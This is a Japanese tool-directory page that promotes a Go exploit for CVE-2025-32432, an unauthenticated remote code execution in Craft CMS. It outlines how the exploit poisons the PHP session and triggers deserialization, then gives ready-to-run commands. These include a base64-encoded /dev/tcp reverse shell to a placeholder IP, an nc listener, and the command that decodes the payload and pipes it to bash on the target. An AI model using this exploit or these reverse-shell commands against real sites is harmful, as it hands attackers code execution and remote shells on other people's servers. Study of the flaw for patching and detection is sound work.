Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/heltonpojo/cve-2025-32432
認証と認可ペイロード生成エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

Go製Craft CMS向けの認証前RCEエクスプロイト。セッション/CSRFトークンを取得し、PHPセッションを汚染して、コマンド実行またはリバースシェルのためのデシリアライゼーションをトリガーします。

リポジトリを見る
21日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32432 — Craft CMS Pre-Auth RCE

Craft CMSに対する認証なしリモートコード実行(RCE)のエクスプロイト。Goで記述されています。
c0gnit00のオリジナル作品に基づいています。

仕組み

  1. GET /admin/login 経由でPHPセッションとCSRFトークンを取得します
  2. クエリ文字列にPHPコードを注入してPHPセッションファイルを汚染(ポイズニング)します
  3. assets/generate-transform 経由でデシリアライゼーションを発火させ、汚染されたファイルをインクルードして実行します

使用方法

root@kitploit:~
go run main.go -u <url> -c <コマンド> 
フラグ説明必須
-uターゲットURL(例:http://target.com)はい
-c実行するコマンド(例:id、whoami)はい

例

root@kitploit:~
# Asset IDなし(自動ブルートフォース)
go run main.go -u http://target.com -c whoami

リバースシェル

1. 自分のIPとポートを指定してペイロードをbase64で生成します:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. リスナーを開きます:

root@kitploit:~
nc -lvnp 4444

3. ペイロードを指定してエクスプロイトを実行します:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

base64の値は、手順1で自分の実際のIPを使用して生成したものに置き換えてください。

注意事項

許可された環境および管理されたセキュリティテストでのみ使用してください。

ツールをダウンロード